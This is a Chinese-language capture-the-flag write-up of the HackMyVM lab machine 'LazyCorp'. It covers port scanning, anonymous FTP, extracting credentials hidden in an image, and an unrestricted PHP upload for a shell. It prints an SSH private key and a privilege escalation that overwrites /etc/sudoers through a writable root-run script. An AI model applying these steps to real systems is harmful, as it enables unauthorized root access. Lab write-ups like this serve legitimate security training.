文章

hackmyvm靶机-easy-lazzycrop

Posted 2025-08-21 Updated 2025-11- 18
By Administrator
21~27 min read

一、信息收集

1.ip端口

❯ nmap 192.168.67.0/24
Starting Nmap 7.97 ( https://nmap.org ) at 2025-08-21 16:40 +0800
Nmap scan report for 192.168.67.1
Host is up (0.00019s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE
53/tcp   open  domain
5000/tcp open  upnp
7000/tcp open  afs3-fileserver

Nmap scan report for 192.168.67.5
Host is up (0.0017s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

2.简单测试

对发现的端口先进行简单测试

❯ nmap 192.168.67.5 -p 21 -sC
Starting Nmap 7.97 ( https://nmap.org ) at 2025-08-21 16:43 +0800
Nmap scan report for 192.168.67.5
Host is up (0.0022s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-syst:
|   STAT:

...

| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 114      119          4096 Jul 16 12:35 pub

❯ nmap 192.168.67.5 -p 22 -sC
Starting Nmap 7.97 ( https://nmap.org ) at 2025-08-21 16:46 +0800
Nmap scan report for 192.168.67.5
Host is up (0.0016s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey:
|   3072 46:82:43:4b:ef:e0:b0:50:04:c0:d5:2c:3c:5c:7d:4a (RSA)
|   256 52:79:ea:92:35:b4:f2:5d:b9:14:f0:21:1c:eb:2f:66 (ECDSA)
|_  256 98:fa:95:86:04:75:31:39:c6:60:26:9e:26:86:82:88 (ED25519)

这里发现ftp有匿名登陆,有一个pub目录

进入目录,发现一个图片,下载下来使用工具跑一下

❯ lftp anonymous@192.168.67.5
Password:
lftp anonymous@192.168.67.5:~> ls
drwxr-xr-x    2 114      119          4096 Jul 16 12:35 pub
lftp anonymous@192.168.67.5:/> cd pub
lftp anonymous@192.168.67.5:/pub> ls
-rw-r--r--    1 0        0         1366786 Jul 16 12:35 note.jpg
lftp anonymous@192.168.67.5:/pub> get note.jpg
1366786 bytes transferred
lftp anonymous@192.168.67.5:/pub> exit

发现了用户名和密码

stegseek note.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: ""
[i] Original filename: "creds.txt".
[i] Extracting to "note.jpg.out".
the file "note.jpg.out" does already exist. overwrite ? (y/n)
y

cat note.jpg.out
Username: dev
Password: d3v3l0pm3nt!nt3rn

二、web打点

1.尝试ssh

刚刚得到了帐号和密码

登陆一哈

❯ ssh dev@192.168.67.5
dev@192.168.67.5's password:
Permission denied, please try again.

看来不是ssh的密码

下面拷打一下80

先跑一下dirsearch

[05:07:51] 301 -  311B  - /blog  ->  http://192.168.67.5/blog/
[05:07:51] 403 -  277B  - /blog/
[05:07:59] 200 -   55B  - /robots.txt
[05:07:59] 403 -  277B  - /server-status/
[05:07:59] 403 -  277B  - /server-status
[05:08:02] 301 -  314B  - /uploads  ->  http://192.168.67.5/uploads/
[05:08:02] 403 -  277B  - /uploads/

这里有个robots.txt,发现两个路径,粘上去访问一下

curl 192.168.67.5/robots.txt
Disallow: /cms-admin.php
Disallow: /auth-LazyCorp-dev/


curl 192.168.67.5/auth-LazyCorp-dev/cms-admin.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 192.168.67.5 Port 80</address>

发现没有,把网站上面的粘上去看一下

curl 192.168.67.5/auth-LazyCorp-dev/login.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 192.168.67.5 Port 80</address>
</body></html>

发现还是不行,这里想到都用小写试一下,然后前面的用户名和密码就可以用到了,最后进入后台

image.png

2.拿到shell

然后上传一个文件,php后缀没有限制,弹一个shell,这里因为靶机打过,改了一下sudoers权限,进不去了,说下思路吧

拿到shell之后可以拿到私钥,拷到本地,改下权限ssh登陆

私钥

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

然后ssh登陆,拿到第一个flag

❯ ssh -i id2 arvind@192.168.67.5
arvind@arvindlazycorp:~$ cat user.txt
FLAG{you_got_foothold_nice}

FLAG{you_got_foothold_nice}

3.sudo提权

查看当前目录,有一个reset,看一下字符串,看到一个目录

strings reset
...
/usr/bin/reset_site.sh

发现有权限写入

arvind@arvindlazycorp:~$ ls -al /usr/bin/reset_site.sh
-rwxrwxr-x 1 root arvind 56 Aug 21 02:10 /usr/bin/reset_site.sh

把sudoers文件改一下

arvind@arvindlazycorp:~$echo 'echo "arvind ALL=(ALL:ALL) NOPASSWD:ALL" > /etc/sudoers'

最后运行一下,登陆root

arvind@arvindlazycorp:~$ ./reset
arvind@arvindlazycorp:~$ sudo su
sudo: unable to resolve host arvindlazycorp: Name or service not known
root@arvindlazycorp:/home/arvind#

FLAG{lazycorp_reset_exploit_worked}

三、夺取flag

root@arvindlazycorp:~# cat root.txt /home/arvind/user.txt
FLAG{lazycorp_reset_exploit_worked}
FLAG{you_got_foothold_nice}

hackmyvm
hackmyvm-easy
License:  CC BY 4.0